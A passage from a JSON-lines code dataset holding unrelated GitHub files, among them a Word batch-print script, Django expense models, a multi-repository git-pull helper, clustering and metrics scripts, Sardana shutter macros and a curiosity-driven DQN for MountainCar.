epochs,\n train_loss,\n acc_train,\n val_loss,\n acc_val)\n f.write(WRITE)\n f.flush()\n\n\n\n\n return losses, val_losses, acc_trains, acc_vals, parameters,SON_PATH\n\n\n\n\n","repo_name":"Heyra-Joker/Deep-Learning","sub_path":"04 Improving-Deep-Neural-Networks/03 TuningProcessSoftmaxBatchNormalization/1.1 SearchingParameters/Softmax.py","file_name":"Softmax.py","file_ext":"py","file_size_in_byte":7913,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"74018584144","text":"import win32com.client as win32 \nimport os\nimport time\n\ncurrentPath = os.getcwd()\n\nprint(\" _ _ ____ _ _ \")\nprint(\" / \\ _ _| |_ ___ | _ \\ _ __(_)_ __ | |_ \")\nprint(\" / _ \\| | | | __/ _ \\ | |_) | '__| | '_ \\| __|\")\nprint(\" / ___ \\ |_| | || (_) | | __/| | | | | | | |_ \")\nprint(\" /_/ \\_\\__,_|\\__\\___/ |_| |_| |_|_| |_|\\__| @LKBrilliant\")\nprint(\"Print multiple coppies of a one page MS Word document with a unique ID on each page.\")\nprint(\"The Word document must have a 'bookmark' named 'ID' where the unique ID need to be placed.\")\nprint(\"Compatible MS Word format: .doc\")\nprint(\"Quit: Ctrl+c\\n\")\n\nwhile True:\n try:\n docName = input(\"Name of the Document: \")\n if not os.path.isfile(\"{}.doc\".format(docName)):\n print(\"{}.doc is not in this directory\".format(docName))\n else: break\n except KeyboardInterrupt:\n print(\"\\nQuitting...\")\n exit()\nwhile True:\n try:\n numPrints = int(input(\"Number of prints: \"))\n break\n except ValueError:\n print(\"Enter a valid answer!\")\n except KeyboardInterrupt:\n print(\"\\nQuitting...\")\n exit()\nwhile True:\n try:\n ID = int(input(\"Starting ID: \"))\n break\n except ValueError:\n print(\"Enter a valid answer!\")\n except KeyboardInterrupt:\n print(\"\\nQuitting...\")\n exit()\n\nprint(\"Sending documents to print...\")\nwhile numPrints >= 1:\n wordApp = win32.gencache.EnsureDispatch('Word.Application')\n wordApp.Visible = False\n doc = wordApp.Documents.Open(\"{}\\\\F002.doc\".format(currentPath))\n rng = doc.Bookmarks(\"ID\").Range # An bookmark is placed where the changes need to happen\n rng.InsertAfter(\"{:02d}\".format(ID))\n doc.PrintOut()\n rng.Delete()\n doc.Save() # Save the document, otherwise MS Word will prompt a message to save\n wordApp.Quit()\n time.sleep(3)\n numPrints -= 1\n ID += 1 \nprint(\"Done\")\n\n","repo_name":"LKbrilliant/Auto-Print","sub_path":"autoPrint.py","file_name":"autoPrint.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24457790513","text":"from django.db import models\nfrom django.contrib.auth.models import User, Group\n\n\nclass Currency(models.Model):\n name = models.CharField(max_length=3)\n symbol = models.CharField(max_length=1, null=True, blank=True)\n value_in_eur = models.DecimalField(decimal_places=2, max_digits=10)\n\n class Meta:\n verbose_name = 'currency'\n verbose_name_plural = 'currencies'\n\n def __str__(self):\n return \"{} ({})\".format(self.name, self.symbol)\n\nclass Expense(models.Model):\n name = models.CharField(max_length=50)\n origin = models.ForeignKey(User, on_delete=models.PROTECT)\n group = models.ForeignKey(Group, on_delete=models.PROTECT)\n description = models.TextField(blank=True)\n value = models.DecimalField(decimal_places=2, max_digits=10)\n currency = models.ForeignKey(Currency, on_delete=models.PROTECT)\n date = models.DateField(blank=True)\n\n def __str__(self):\n return \"{}-{} ({}) {} {}\".format(self.group, self.name, self.origin, self.value, self.currency)\n\n def delete(self, *args, **kwargs):\n shares = self.share_set.all()\n for share in shares:\n share.delete()\n super().delete(*args, **kwargs)\n\nclass Share(models.Model):\n value = models.DecimalField(decimal_places=2, max_digits=10)\n owner = models.ForeignKey(User, on_delete=models.PROTECT)\n expense = models.ForeignKey(Expense, on_delete=models.PROTECT)\n\n def __str__(self):\n return \"{} {}\".format(self.owner, self.value)\n","repo_name":"mbombar/thunes","sub_path":"MyMoney/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34586495932","text":"#- Készítsen függvényt, aminek segítségével el lehet dönteni, hogy érdemes-e egy boltot működtetni\n#\t- paraméterek\n#\t\t- havi fix rezsi ktg\n#\t\t- havi bér ktg\n#\t\t- havi várható forgalom\n#\t\t- termékek átlagos haszon %-a\n#\t- visszatérési érték: mennyi pénz \"marad\" a végén\n\t\ndef bolt(rezsi,ber, forgalom,haszon):\n return (forgalom*haszon/100)-rezsi-ber\n\n \n\nrezsi = int(input('Adja meg hogy mennyi rezsit fizet havonta: '))\nber = int(input('Adja meg hogy mennyi bére van: '))\nforgalom = int(input('Adja meg a havi várható forgalmát: '))\nhaszon = float(input('Adja meg hány százalék haszon van a termékein: '))\nosszHaszon=bolt(rezsi,forgalom, haszon,ber)\nprint(f'Az üzlet bevétele {osszHaszon}')\n\nif osszHaszon>0:\n print('A boltot megéri működtetni a boltot.')\nelse:\n print('Nem éri meg működtetni a boltot.')\n\n","repo_name":"fabrykevin/agazati","sub_path":"agazatialapvizsgagyujt/python + web kész feladatok + leírás (saját)/Python/20230216/bolt.py","file_name":"bolt.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2802184926","text":"import os\n#update 'base_path' with project root folder that contains all the git repositories\nbase_path= \"/Users/razvan_vancea/Projects/QAPractice/\"\n\n#update 'repositories' with each repository's folder name\nrepositories=[\"automation\",\"users\",\"webapp\"]\n\n#update 'branch' with your default branch name: 'main' or 'master'?\nbranch=\"main\"\n\ngit = \" && git checkout \"+branch+\" && git pull && git checkout -\"\nfor repo in repositories:\n print(\"========== \"+repo+\" ==========\")\n os.system(\"cd \"+base_path+repo+git)\n \n","repo_name":"razvanvancea/cli-git-pull-microservices","sub_path":"git_pull.py","file_name":"git_pull.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33151493846","text":"import sys\ninput = sys.stdin.readline\n\nlst = []\nzero, one = 0, 0\nn = int(input())\n\ndef check_paper(paper):\n max_v = max(map(max, paper))\n min_v = min(map(min, paper))\n if max_v == min_v:\n return True\n else:\n return False\n\ndef re(n, x, y):\n global zero, one\n if check_paper([i[y : y + n] for i in lst[x : x + n]]):\n if lst[x][y]:\n one += 1\n else:\n zero += 1\n else:\n re(n // 2, x, y)\n re(n // 2, x, y + n // 2)\n re(n // 2, x + n // 2, y)\n re(n // 2, x + n // 2, y + n // 2)\n \n\nfor i in range(n):\n lst.append(list(map(int, input().split())))\n\nre(n, 0, 0)\n\nprint(zero)\nprint(one)\n\n\n\n\n\n\n","repo_name":"HeoYou/algorithm-python","sub_path":"Q2630 색종이 만들기(분할 정복).py","file_name":"Q2630 색종이 만들기(분할 정복).py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30334195123","text":"\"\"\"\n In this stage, various classification metrics are extracted from the model.\n\"\"\"\nimport os\n\nimport pandas as pd\nimport json\nimport joblib\nimport sklearn\n\nfrom utils.evaluation.classification_metrics import get_classification_metrics\nfrom utils.dvc.params import get_params\nfrom utils.misc import create_dir\n\nparams = get_params('all')\n\nDATASET = params['dataset']\nMODEL_DIR = os.path.join('models', DATASET, 'bin')\nMETRICS_DIR = os.path.join('metrics', DATASET)\nVIS_DIR = os.path.join('visualisation', DATASET)\ncreate_dir(METRICS_DIR)\n\ncae_df = pd.read_csv(\n os.path.join('data', 'processed', DATASET, 'tabular', 'cae_mse.csv'),\n index_col=0\n)\n\ncomplexity_df = pd.read_csv(\n os.path.join('data', 'processed', DATASET, 'tabular', 'complexity.csv'),\n index_col=0)\n\ncomplexity_df = complexity_df[['jpeg_mse']]\ncae_df = cae_df.join(complexity_df)\n\ncae_df['label'] = cae_df['label'].apply(\n lambda x: 1 if x == 'positive' else 0)\n\nmask = cae_df['data_split'] == 'test'\ntest_df = cae_df[mask].drop(columns=['data_split'])\n\n# Load models\ncae_model = joblib.load(\n os.path.join(MODEL_DIR, 'logistic_regression_cae.joblib'))\njpeg_model = joblib.load(\n os.path.join(MODEL_DIR, 'logistic_regression_jpeg.joblib'))\ncombined_model = joblib.load(\n os.path.join(MODEL_DIR, 'logistic_regression_combined.joblib'))\n\n\ncae_test_metrics = get_classification_metrics(\n test_df['label'],\n cae_model.predict(test_df.drop(columns=['label', 'jpeg_mse'])))\n\n# Write metrics on json file\nmetrics = {\n 'test_f1': cae_test_metrics['f1'],\n 'test_acc': cae_test_metrics['accuracy'],\n 'test_prec': cae_test_metrics['precision'],\n 'test_rec': cae_test_metrics['recall']\n}\n\nwith open(\n os.path.join(METRICS_DIR, 'cae_metrics.json'), 'w') as f:\n json.dump(metrics, f)\n\ncm_display = sklearn.metrics.ConfusionMatrixDisplay(\n confusion_matrix=cae_test_metrics['conf_matrix'],\n display_labels=['Normal', 'Anomalous'])\n\ncm_display.plot().figure_.savefig(\n os.path.join(VIS_DIR, 'cae_confusion_matrix.png'))\n\njpeg_test_metrics = get_classification_metrics(\n test_df['label'],\n jpeg_model.predict(test_df.drop(columns=['label', 'cae_mse'])))\nmetrics = {\n 'test_f1': jpeg_test_metrics['f1'],\n 'test_acc': jpeg_test_metrics['accuracy'],\n 'test_prec': jpeg_test_metrics['precision'],\n 'test_rec': jpeg_test_metrics['recall']\n}\n\nwith open(\n os.path.join(METRICS_DIR, 'jpeg_metrics.json'), 'w') as f:\n json.dump(metrics, f)\n\ncm_display = sklearn.metrics.ConfusionMatrixDisplay(\n confusion_matrix=jpeg_test_metrics['conf_matrix'],\n display_labels=['Normal', 'Anomalous'])\ncm_display.plot().figure_.savefig(\n os.path.join(VIS_DIR, 'jpeg_confusion_matrix.png'))\n\ncombined_test_metrics = get_classification_metrics(\n test_df['label'], combined_model.predict(test_df.drop(columns=['label'])))\nmetrics = {\n 'test_f1': combined_test_metrics['f1'],\n 'test_acc': combined_test_metrics['accuracy'],\n 'test_prec': combined_test_metrics['precision'],\n 'test_rec': combined_test_metrics['recall']\n}\n\nwith open(\n os.path.join(METRICS_DIR, 'combined_metrics.json'), 'w') as f:\n json.dump(metrics, f)\n\ncm_display = sklearn.metrics.ConfusionMatrixDisplay(\n confusion_matrix=combined_test_metrics['conf_matrix'],\n display_labels=['Normal', 'Anomalous'])\ncm_display.plot().figure_.savefig(\n os.path.join(VIS_DIR, 'combined_confusion_matrix.png'))\n","repo_name":"alexsandercaac/img-complexity-cae","sub_path":"src/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":3420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34519211044","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ncomic_con = pd.read_csv('./dataset/comic_con.csv', index_col=0)\ncomic_con.head()\n\n# pre processamento\nfrom scipy.cluster.vq import whiten\nfrom scipy.cluster.hierarchy import linkage, fcluster\n\ncomic_con['x_scaled'] = whiten(comic_con['x_coordinate'])\ncomic_con['y_scaled'] = whiten(comic_con['y_coordinate'])\n\n# Hierarchical clustering: single method\n# Use the linkage()\ndistance_matrix = linkage(comic_con[['x_scaled', 'y_scaled']], method='ward', metric='euclidean')\n\n# Assign cluster labels\ncomic_con['cluster_labels'] = fcluster(distance_matrix, 2, criterion='maxclust')\n\n# Plot clusters\nsns.scatterplot(x='x_scaled', y='y_scaled', hue='cluster_labels', data=comic_con);\n\n# Hierarchical clustering: complete method\n# Use the linkage()\ndistance_matrix = linkage(comic_con[['x_scaled', 'y_scaled']], method='single', metric='euclidean')\n\n# Assign cluster labels\ncomic_con['cluster_labels'] = fcluster(distance_matrix, 2, criterion='maxclust')\n\n# Plot clusters\nsns.scatterplot(x='x_scaled', y='y_scaled', hue='cluster_labels', data=comic_con);\n\n# Use the linkage()\ndistance_matrix = linkage(comic_con[['x_scaled', 'y_scaled']], method='complete', metric='euclidean')\n\n# Assign cluster labels\ncomic_con['cluster_labels'] = fcluster(distance_matrix, 2, criterion='maxclust')\n\n# Plot clusters\nsns.scatterplot(x='x_scaled', y='y_scaled', hue='cluster_labels', data=comic_con);\n\n# Visualize clusters with matplotlib\n# Define a colors dictionary for clusters\ncolors = {1:'red', 2:'blue'}\n\n# Plot the scatter plot\ncomic_con.plot.scatter(x='x_scaled', y='y_scaled', c=comic_con['cluster_labels'].apply(lambda x: colors[x]));\n\n# Visualize clusters with seaborn\n# Plot a scatter plot using seaborn\nsns.scatterplot(x='x_scaled', y='y_scaled', hue='cluster_labels', data=comic_con)\n\n# How many clusters?\n# Create a dendrogram\nfrom scipy.cluster.hierarchy import dendrogram\n\n# Create a dendrogram\ndn = dendrogram(distance_matrix)","repo_name":"leandro-raposo/projects","sub_path":"01_clustering/ComicCon.py","file_name":"ComicCon.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73289827664","text":"import sys\nimport os\n\ntest_mode_state = False\ntest_env_var_read = False\n\n\ndef do_error_exit(log_text):\n \"\"\"\n log an error and exit with return code 1\n\n Parameters\n ----------\n log_text : str\n the text to log as error\n \"\"\"\n\n print(f\"Error: {log_text}\", file=sys.stderr)\n exit(1)\n\n\ndef grab(structure=None, path=None, separator=\".\", fallback=None):\n \"\"\"\n get data from a complex object/json structure with a\n \".\" separated path information. If a part of a path\n is not not present then this function returns the\n value of fallback (default: \"None\").\n\n example structure:\n data_structure = {\n \"rows\": [{\n \"elements\": [{\n \"distance\": {\n \"text\": \"94.6 mi\",\n \"value\": 152193\n },\n \"status\": \"OK\"\n }]\n }]\n }\n example path:\n \"rows.0.elements.0.distance.value\"\n example return value:\n 15193\n\n Parameters\n ----------\n structure: dict, list, object\n object structure to extract data from\n path: str\n nested path to extract\n separator: str\n path separator to use. Helpful if a path element\n contains the default (.) separator.\n fallback: dict, list, str, int\n data to return if no match was found\n\n Returns\n -------\n str, dict, list\n the desired path element if found, otherwise None\n \"\"\"\n\n max_recursion_level = 100\n\n current_level = 0\n levels = len(path.split(separator))\n\n if structure is None or path is None:\n return fallback\n\n # noinspection PyBroadException\n def traverse(r_structure, r_path):\n nonlocal current_level\n current_level += 1\n\n if current_level > max_recursion_level:\n return fallback\n\n for attribute in r_path.split(separator):\n if isinstance(r_structure, dict):\n r_structure = {k.lower(): v for k, v in r_structure.items()}\n\n try:\n if isinstance(r_structure, list):\n data = r_structure[int(attribute)]\n elif isinstance(r_structure, dict):\n data = r_structure.get(attribute.lower())\n else:\n data = getattr(r_structure, attribute)\n\n except Exception:\n return fallback\n\n if current_level == levels:\n return data if data is not None else fallback\n else:\n return traverse(data, separator.join(r_path.split(separator)[1:]))\n\n return traverse(structure, path)\n\n\ndef in_test_mode():\n\n global test_env_var_read, test_mode_state\n\n if test_env_var_read is False:\n test_mode_state = True if os.environ.get(\"TESTMODE\") else False\n test_env_var_read = True\n if test_mode_state is True:\n print(\"Running in TESTMODE\")\n\n return test_mode_state\n","repo_name":"bb-Ricardo/fritzinfluxdb","sub_path":"fritzinfluxdb/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"48"} +{"seq_id":"74868086865","text":"from collections import deque\r\n\r\nqueue = [1, 2, 3]\r\n\r\nqueue.pop(0)\r\nqueue.pop(0)\r\n\r\n#Colas implementadas eficientemente en la librería estandar\r\nqueue = deque([1, 2, 3])\r\n\r\n#Agrego los elementos\r\nqueue.append(4)\r\nqueue.append(5)\r\n\r\n#Saco los elementos\r\nqueue.popleft()\r\nqueue.popleft()","repo_name":"danielmserna/U.-Austral.-Estructuras-de-datos-en-Python","sub_path":"ListasComoColas.py","file_name":"ListasComoColas.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"16863869341","text":"# built-in\nimport re\nfrom datetime import datetime\nfrom hashlib import sha256\nfrom logging import getLogger\nfrom pathlib import Path\nfrom typing import Dict, Iterable, List, Optional, Tuple\n\n# external\nimport attr\nfrom packaging.requirements import Requirement\nfrom packaging.utils import canonicalize_name\n\n# app\nfrom ...cache import TextCache\nfrom ...config import config\nfrom ...constants import ARCHIVE_EXTENSIONS\nfrom ...models.release import Release\nfrom ._base import WarehouseBaseRepo\n\n\nlogger = getLogger('dephell.repositories.warehouse.simple')\nREX_WORD = re.compile('[a-zA-Z]+')\n\n\n@attr.s()\nclass WarehouseLocalRepo(WarehouseBaseRepo):\n name = attr.ib(type=str)\n path = attr.ib(type=Path)\n\n prereleases = attr.ib(type=bool, factory=lambda: config['prereleases']) # allow prereleases\n from_config = attr.ib(type=bool, default=False)\n propagate = True # deps of deps will inherit repo\n\n def __attrs_post_init__(self) -> None:\n if isinstance(self.path, str):\n self.path = Path(self.path)\n\n def get_releases(self, dep) -> tuple:\n\n releases_info = dict()\n for archive_path in self.path.glob('**/*'):\n if not archive_path.name.endswith(ARCHIVE_EXTENSIONS):\n continue\n name, version = self._parse_name(archive_path.name)\n if canonicalize_name(name) != dep.name:\n continue\n if not version:\n continue\n\n if version not in releases_info:\n releases_info[version] = []\n releases_info[version].append(self._get_hash(path=archive_path))\n\n # init releases\n releases = []\n prereleases = []\n for version, hashes in releases_info.items():\n # ignore version if no files for release\n release = Release(\n raw_name=dep.raw_name,\n version=version,\n time=datetime.fromtimestamp(self.path.stat().st_mtime),\n hashes=hashes,\n extra=dep.extra,\n )\n\n # filter prereleases if needed\n if release.version.is_prerelease:\n prereleases.append(release)\n if not self.prereleases and not dep.prereleases:\n continue\n\n releases.append(release)\n\n # special case for black: if there is no releases, but found some\n # prereleases, implicitly allow prereleases for this package\n if not releases and prereleases:\n releases = prereleases\n\n releases.sort(reverse=True)\n return tuple(releases)\n\n async def get_dependencies(self, name: str, version: str,\n extra: Optional[str] = None) -> Tuple[Requirement, ...]:\n cache = TextCache('warehouse-local', 'deps', name, str(version))\n deps = cache.load()\n if deps is None:\n deps = self._get_deps_from_files(name=name, version=version)\n cache.dump(deps)\n elif deps == ['']:\n return ()\n return self._convert_deps(deps=deps, name=name, version=version, extra=extra)\n\n def search(self, query: Iterable[str]) -> List[Dict[str, str]]:\n raise NotImplementedError\n\n @staticmethod\n def _get_hash(path: Path) -> str:\n digest = sha256()\n with path.open('rb') as stream:\n for byte_block in iter(lambda: stream.read(4096), b''):\n digest.update(byte_block)\n return digest.hexdigest()\n\n def _get_deps_from_files(self, name, version):\n # app\n from ...converters import SDistConverter, WheelConverter\n\n paths = []\n for path in self.path.glob('**/*'):\n if not path.name.endswith(ARCHIVE_EXTENSIONS):\n continue\n file_name, file_version = self._parse_name(path.name)\n if canonicalize_name(file_name) != name:\n continue\n if not file_version or file_version != str(version):\n continue\n paths.append(path)\n\n sdist = SDistConverter()\n wheel = WheelConverter()\n rules = (\n (wheel, 'py3-none-any.whl'),\n (wheel, '-none-any.whl'),\n (wheel, '.whl'),\n (sdist, '.tar.gz'),\n (sdist, '.zip'),\n )\n\n for converter, ext in rules:\n for path in paths:\n if not path.name.endswith(ext):\n continue\n root = converter.load(path)\n deps = []\n for dep in root.dependencies:\n if dep.envs == {'main'}:\n deps.append(str(dep))\n else:\n for env in dep.envs.copy() - {'main'}:\n dep.envs = {env}\n deps.append(str(dep))\n return tuple(deps)\n return ()\n","repo_name":"dephell/dephell","sub_path":"dephell/repositories/_warehouse/_local.py","file_name":"_local.py","file_ext":"py","file_size_in_byte":4882,"program_lang":"python","lang":"en","doc_type":"code","stars":1758,"dataset":"github-code","pt":"48"} +{"seq_id":"10749886842","text":"import dash_bootstrap_components as dbc\nfrom dash import dcc, html\n\n# we use the Row and Col components to construct the sidebar header\n# it consists of a title, and a toggle, the latter is hidden on large screens\nright_sidebar_header = dbc.Row(\n [\n dbc.Col(\n [\n html.Button(\n # use the Bootstrap navbar-toggler classes to style\n html.Span(className=\"navbar-toggler-icon right-icon-custom\"),\n className=\"navbar-toggler\",\n # the navbar-toggler classes don't set color\n style={\n \"color\": \"rgba(0,0,0,.5)\",\n \"border-color\": \"rgba(0,0,0,.1)\",\n },\n id=\"right-navbar-toggle\",\n ),\n html.Button(\n # use the Bootstrap navbar-toggler classes to style\n html.Span(className=\"navbar-toggler-icon right-icon-custom\"),\n className=\"navbar-toggler\",\n # the navbar-toggler classes don't set color\n style={\n \"color\": \"rgba(0,0,0,.5)\",\n \"border-color\": \"rgba(0,0,0,.1)\",\n },\n id=\"right-sidebar-toggle\",\n ),\n ],\n # the column containing the toggle will be only as wide as the\n # toggle, resulting in the toggle being right aligned\n width=\"auto\",\n # vertically align the toggle in the center\n align=\"center\",\n ),\n dbc.Col(html.P(\"transcription\", className=\"font-sm\")),\n ]\n)\n\nright_sidebar = html.Div(\n [\n right_sidebar_header,\n # we wrap the horizontal rule and short blurb in a div that can be\n # hidden on a small screen\n html.Div(\n [\n html.Hr(),\n html.P(\n \"Sidebar Right\",\n className=\"lead\",\n ),\n ],\n id=\"right-blurb\",\n ),\n # use the Collapse component to animate hiding / revealing links\n dbc.Collapse(\n\n [html.Div(f\"Itens in the second Sidebar{n}\") for n in range(0, 10)],\n id=\"right-collapse\",\n ),\n ],\n id=\"right-sidebar\",\n)\n","repo_name":"kaburelabs/dash-double-sidebar-comp","sub_path":"sidebar_right.py","file_name":"sidebar_right.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"13789374331","text":"from conans import ConanFile, CMake, tools\n\n\nclass MichaQtUtilisLibConan(ConanFile):\n name = \"MichaQtUtilisLib\"\n version = \"0.2\"\n license = \"MIT - https://github.com/jackdaimond/MichaQtUtilisLib/blob/master/LICENSE\"\n author = \"Michael Kloske\"\n url = \"https://github.com/jackdaimond/MichaQtUtilisLib.git\"\n description = \"Contains several functionalities often used in other Qt applications.\"\n settings = \"os\", \"compiler\", \"build_type\", \"arch\"\n options = {\"shared\": [True, False], \"fPIC\": [True, False]}\n default_options = {\"shared\": False, \"fPIC\": True}\n generators = \"qmake\"\n\n scm = {\n \"type\": \"git\",\n \"subfolder\": \"\",\n \"url\": \"https://github.com/jackdaimond/MichaQtUtilisLib.git\",\n \"revision\": \"auto\"\n }\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n #def source(self):\n # self.run(\"git clone https://github.com/conan-io/hello.git\")\n # # This small hack might be useful to guarantee proper /MT /MD linkage\n # # in MSVC if the packaged project doesn't have variables to set it\n # # properly\n\n def build(self):\n if(self.settings.build_type == \"Debug\"):\n self.run(\"qmake MichaQtUtilisLib.pro CONFIG+=debug\")\n else:\n self.run(\"qmake MichaQtUtilisLib.pro CONFIG+=release\")\n \n self.run(\"nmake\")\n # Explicit way:\n # self.run('cmake %s/hello %s'\n # % (self.source_folder, cmake.command_line))\n # self.run(\"cmake --build . %s\" % cmake.build_config)\n\n def package(self):\n self.copy(\"*.h*\", dst=\"include/MichaQtUtilisLib\", src=\"src\")\n self.copy(\"*.lib\", dst=\"lib\", keep_path=False)\n self.copy(\"*.dll\", dst=\"bin\", keep_path=False)\n self.copy(\"*.so\", dst=\"lib\", keep_path=False)\n self.copy(\"*.dylib\", dst=\"lib\", keep_path=False)\n self.copy(\"*.a\", dst=\"lib\", keep_path=False)\n\n def package_info(self):\n self.cpp_info.libs = [\"MichaQtUtilisLib\"]\n","repo_name":"jackdaimond/MichaQtUtilisLib","sub_path":"conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14897979681","text":"import time\n\nfrom tango import DeviceProxy\nfrom sardana.macroserver.macro import macro\n\n@macro()\ndef ProbeOn(self):\n \"\"\"Macro ProbeOn\"\"\"\n \n Probe=DeviceProxy('raremag/ThorlabsMFF102/flip01')\n if Probe.isClose:\n self.output(\"Probe shutter is already open\")\n else:\n Probe.close()\n time.sleep(1)\n if Probe.isClose:\n self.output(\"Probe shutter opened\")\n else:\n self.output(\"Could not open Probe shutter\")\n\n@macro()\ndef ProbeOff(self):\n \"\"\"Macro ProbeOff\"\"\"\n \n Probe=DeviceProxy('raremag/ThorlabsMFF102/flip01')\n if Probe.isOpen:\n self.output(\"Probe shutter is already closed\")\n else:\n Probe.open()\n time.sleep(1)\n if Probe.isOpen:\n self.output(\"Probe shutter closed\")\n else:\n self.output(\"Could not close Probe shutter\")\n\n@macro()\ndef PumpOn(self):\n \"\"\"Macro PumpOn\"\"\"\n \n Pump=DeviceProxy('raremag/ThorlabsMFF102/flip02')\n if Pump.isOpen:\n self.output(\"Pump shutter is already open\")\n else:\n Pump.open()\n time.sleep(1)\n if Pump.isOpen:\n self.output(\"Pump shutter opened\")\n else:\n self.output(\"Could not open Pump shutter\")\n\n@macro()\ndef PumpOff(self):\n \"\"\"Macro PumpOff\"\"\"\n \n Pump=DeviceProxy('raremag/ThorlabsMFF102/flip02')\n if Pump.isClose:\n self.output(\"Pump shutter is already closed\")\n else:\n Pump.close()\n time.sleep(1)\n if Pump.isClose:\n self.output(\"Pump shutter closed\")\n else:\n self.output(\"Could not close Pump shutter\")","repo_name":"MBI-Div-B/sardana-mbi-raremag","sub_path":"macros/laserShutter.py","file_name":"laserShutter.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22820414347","text":"import random\n\nif __name__ == \"__main__\":\n s = ''\n for i in range(3):\n s += input() + '\\n'\n s = s[:-1]\n status = s[0]\n if status == \"x\":\n status = 1\n else:\n status = 2\n s = s[1:]\n board = [[int(i) for i in line.split()] for line in s.split('\\n')]\n nulls = 0\n moves = []\n for i in range(3):\n for j in range(3):\n if board[j][i] == 0:\n moves.append((i + 1, j + 1))\n x, y = random.choice(moves)\n print(x, y)","repo_name":"RobertArifulin/BotsFight","sub_path":"bots/tictactoe_random.py","file_name":"tictactoe_random.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"16895686719","text":"\"\"\"\r\nhere curiosity by random network distillation is used for exploration .\r\nepsilon greedy is not used for exploration.\r\nAnd the policy rollout is is episodic even if we are not at all using extrinsic rewards\r\nsince once it wins it returns to default state and it will deicourage curiosity based learning to win.\r\n\r\n\"\"\"\r\n\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport gym\r\nfrom collections import deque \r\nimport random # for random sampling from deque\r\n\r\nenv=gym.make('MountainCar-v0')\r\n\r\n\r\nenv=env.unwrapped\r\n\r\nn_obs=2\r\nn_act=3\r\n\r\nqprimary = tf.keras.models.Sequential()\r\nqprimary.add(tf.keras.layers.Dense(units=128,input_dim=n_obs, activation='sigmoid'))\r\nqprimary.add(tf.keras.layers.Dense(units=128, activation=\"relu\"))\r\nqprimary.add(tf.keras.layers.Dense(units=n_act, activation=None))\r\n#optimizer=tf.keras.optimizers.Adam(lr=0.001,beta_1=0.9,epsilon=None,decay=0.00,amsgrad=False)\r\nqprimary.compile(loss=\"mse\", optimizer=\"RMSprop\", metrics=['accuracy'])\r\nqprimary.summary()\r\n\r\nqtarget = tf.keras.models.Sequential()\r\nqtarget.add(tf.keras.layers.Dense(units=128,input_dim=n_obs, activation='sigmoid'))\r\nqtarget.add(tf.keras.layers.Dense(units=128, activation=\"relu\"))\r\nqtarget.add(tf.keras.layers.Dense(units=n_act, activation=None))\r\n#optimizer=tf.keras.optimizers.Adam(lr=0.001,beta_1=0.9,epsilon=None,decay=0.00,amsgrad=False)\r\nqtarget.compile(loss=\"mse\", optimizer=\"RMSprop\", metrics=['accuracy'])\r\nqtarget.summary()\r\n\r\n\r\n\r\nencoder = tf.keras.models.Sequential()\r\nencoder.add(tf.keras.layers.Dense(units=128,input_dim=2, activation='relu'))\r\nencoder.add(tf.keras.layers.Dense(units=1000, activation=\"sigmoid\"))\r\nencoder.summary()\r\nencoder.trainable=False\r\n\r\npredictor= tf.keras.models.Sequential()\r\npredictor.add(tf.keras.layers.Dense(units=128,input_dim=2, activation='relu'))\r\npredictor.add(tf.keras.layers.Dense(units=1000, activation=\"sigmoid\"))\r\n\r\npredictor.compile(loss=\"mse\", optimizer=\"RMSprop\", metrics=['accuracy'])\r\npredictor.summary()\r\n\r\n\r\n\r\nInitial_curiosity_FILE=r\"C:\\\\Users\\\\Dell\\\\Desktop\\\\holidASY\\\\dqn_rnd_curiosity_keras.h5\"\r\ntf.keras.models.save_model(model=predictor,filepath= Initial_curiosity_FILE ,overwrite=True,include_optimizer=True)\r\nprint(\"inital curiosity saved\")\r\n\r\n\r\n\r\n\r\n\r\nmemory=deque(maxlen=2000)\r\nepsilon=1.0\r\nepsilon_min=0.01\r\nepsilon_decay=0.99\r\ndef restore_curiosity():\r\n\tpredictor=tf.keras.models.load_model( Initial_curiosity_FILE )\r\n\tpredictor.compile(loss=\"mse\", optimizer=\"RMSprop\", metrics=['accuracy'])\r\n\tprint(\"curiosity restored\")\r\n\r\ndef act(s):\r\n\tglobal epsilon\r\n\tepsilon=epsilon*epsilon_decay\r\n\tepsilon=max(epsilon,epsilon_min)\r\n\t# No random action taken => pure curiosity\r\n\t#if np.random.random() n[ i+1 ]:\n\t\t\t\tx = n[ i+1 ]\n\t\t\t\tn[ i+1 ] = n[ i 